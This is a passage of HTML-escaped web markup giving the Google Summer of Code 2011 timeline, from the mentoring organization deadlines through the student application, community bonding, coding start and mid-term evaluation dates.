organizations can begin submitting applications to Google.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;March 11:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;23:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentoring  organization application deadline.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;March 14-17:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 
c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Google program  administrators review organization applications.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;March 18:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;List of  accepted mentoring organizations published on the Google Summer of Code  2011 site.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;March 18-27:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 
c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Would-be student  participants discuss application ideas with mentoring organizations.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;March 28:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Student  application period opens.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;April 8:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Student  application deadline.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Interim Period:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentoring  organizations review and rank student proposals; where necessary,  mentoring organizations may request further proposal detail from the  student applicant.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;April 22:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;ol class=&quot;c13&quot;&gt;&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;All mentors must be signed  up and all student proposals matched with a mentor - 07:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Student ranking/scoring deadline. Please do  not add private comments with a nonzero score or mark students as  ineligible (unless doing so as part of resolving duplicate accepted  students) after this deadline - 17:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;IRC meeting to resolve any outstanding  duplicate accepted students - 19:00 UTC #gsoc&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;April 25:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Accepted  student proposals announced on the Google Summer of Code 2011 site.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c15&quot;&gt;&lt;a href=&quot;http://googlesummerofcode.blogspot.com/2007/04/so-what-is-this-community-bonding-all.html&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Community Bonding Period&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 
c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Students get to know  mentors, read documentation, get up to speed to begin working on their  projects.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;May 23:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;ol class=&quot;c13&quot;&gt;&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Students begin coding for  their GSoC projects;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Google begins issuing initial student payments  provided tax forms are on file and students are in good standing with  their communities.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Interim Period:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentors give  students a helping hand and guidance on their projects.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;July 11:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentors and  students can begin submitting mid-term evaluations.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
